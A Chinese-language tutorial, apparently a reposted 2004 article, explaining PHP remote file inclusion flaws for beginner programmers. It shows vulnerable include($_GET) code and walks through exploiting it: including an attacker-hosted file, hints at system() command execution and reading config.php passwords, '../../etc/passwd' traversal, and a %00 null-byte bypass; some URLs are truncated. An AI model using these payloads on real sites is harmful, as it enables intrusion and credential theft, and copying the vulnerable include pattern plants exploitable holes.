對於初階PHP程式設計師來說,對於PHP的安全性還不能完全掌握。首先我們要了解致使程式漏洞的原理。下面我們就來介紹一下PHP遠端檔案包含漏洞的產生原因。
首先的問題是,什麼是」遠端檔案包含漏洞「?簡要的回答是伺服器透過PHP的任意文件包含過濾不嚴,從而去執行一個惡意文件,這是個程式設計師過濾上的問題,請記住,所有的cgi程式都有這樣的bug。
1.找出PHP遠端檔案包含漏洞bug:
為了發現目標,我們首先要知道包含兩個字的意思,在所有語言裡(大多數)都有這種方法包含任意的文件。在PHP裡,我們使用include()函數,它的工作流程:
如果你在Main.PHP裡包含include1.PHP,我將這樣寫include("include1.PHP").不是很科學,但你要知道其中的道理。
我們先看這個,當使用者輸入通過後就包含文件,也就是
<ol class="dp-c"> <li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br> ) { </span></span></li> <li> <span class="keyword">include</span><span> </span><span class="vars">$_GET</span><span> <br> ; </span> </li> <li class="alt"> <span>} </span><span class="keyword">else</span><span> { </span> </li> <li> <span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span> </li> <li class="alt"><span>} </span></li> </ol>
這種結構在動態網站裡是常見的,問題是它允許這樣[url]hxxp://www.target.com/explame.PHP?page=main.PHP[/url] 或[url]hxxp://www.target.com/explame.PHP?page=downloads .PHP[/url]來查看。無論如何,如果你的程式裡有這樣的bug也很悲哀了,只能怪你,儘管只是一句過濾的問題,但就是這一句過濾就有了Script hacker.在zone-h.org的調查裡,文件包含的攻擊率占到9.4%,足夠我們引起重視,而且它也不是一兩天的問題,幾年前就有了,但到了今天,一批一批程式設計師依舊走老路重走,所以就有了這篇文章,在2004年寫這樣的文章已經老掉牙,但我還是要寫,畢竟牢騷能讓人收益的時候就不叫牢騷了。
2.測試
這裡有個遠端檔案包含的例子,目的只有一個,為了你的程式安全,我們來看具體的
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?</span><span class="attribute">page</span><span>=</span><span class="attribute-value">zizzy</span><span>[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(zizzy): failed to open stream: No such file or directory </span></li> <li><span> </span></li> <li class="alt"><span>in /var/www/htdocs/index.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'zizzy' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/index.PHP on line 3 </span> </li> </ol>
PHP輸出的這些錯誤訊息告訴我們,程式去包含檔案/var/www/htdocs/zizzy,但沒找到,看見了吧,No such file or directory沒這樣的文件,現在理解PHP遠端文件包含漏洞了吧。
3.利用
PHP確實很好,可以遠端調用文件,那我創建一個yeah.txt,放在我的站上[url]hxxp: //www.mysite.com/yeah.txt.[/url]內容這樣
<ol class="dp-c"><li class="alt"><span><span>< ? </span></span></li><li><span class="func">echo</span><span> </span><span class="string">"Wow,test!"</span><span>; </span></li><li class="alt"><span>?> </span></span></li></ol>
那麼
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li></ol>
回顯出Wow,test!,這樣就執行了。讀取config.PHP也不難吧,裡面放了mysql密碼啊。把yeah.txt寫成看看,寫成system()去試試,有什麼感想,在過分點,這樣提交page=../../../../../../../etc /passwd。知道什麼叫真正的包含了吧。
4.另一種PHP遠端檔案包含漏洞的原理
有時程式設計師換種寫法,寫成這樣,限制了包含範圍
<ol class="dp-c"> <li class="alt"><span><span class="keyword">if</span><span> (</span><span class="vars">$_GET</span><span> <br> ) { </span></span></li> <li> <span class="keyword">include</span><span> </span><span class="string">"$_GET <br> .PHP"</span><span>; </span> </li> <li class="alt"><span>} </span></li> <li> <span class="keyword">else</span><span> </span> </li> <li class="alt"><span>{ </span></li> <li> <span class="keyword">include</span><span> </span><span class="string">"home.PHP"</span><span>; </span> </li> <li class="alt"><span>} </span></li> </ol>
我們提交
<ol class="dp-xml"> <li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url] </span></span></li> <li><span> </span></li> <li class="alt"><span>Warning: main([url]hxxp://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: </span></li> <li><span> </span></li> <li class="alt"><span>hxxp request failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening 'hxxp://www.mysite.com/yeah.txt.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
包含失敗了,限制了後綴名為PHP,把mysite.com的yeah.txt改為yeah.PHP ,然後照樣執行。那passwd怎麼辦?
<ol class="dp-xml"> <li class="alt"><span><span>Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: hxxp request </span></span></li> <li><span> </span></li> <li class="alt"><span>failed! hxxp/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3 </span></li> <li><span> </span></li> <li class="alt"><span>Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion </span></li> <li><span> </span></li> <li class="alt"> <span>(</span><span class="attribute">include_path</span><span>=</span><span class="attribute-value">'.:/usr/local/lib/PHP'</span><span>) in /var/www/htdocs/explame.PHP on line 3 </span> </li> </ol>
在這裡使用個NUL字符,也就是
<ol class="dp-xml"><li class="alt"><span><span>[url]hxxp://www.target.com/explame.PHP?pa.../etc/passwd%00[/url] </span></span></li></ol>http://www.bkjia.com/PHPjc/445831.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/445831.htmlTechArticle對於初級PHP 程式設計師來說,對於PHP的安全性還不能完全掌握。首先我們要了解致使程式漏洞的原理。下面我們就來介紹PHP 遠端檔案包...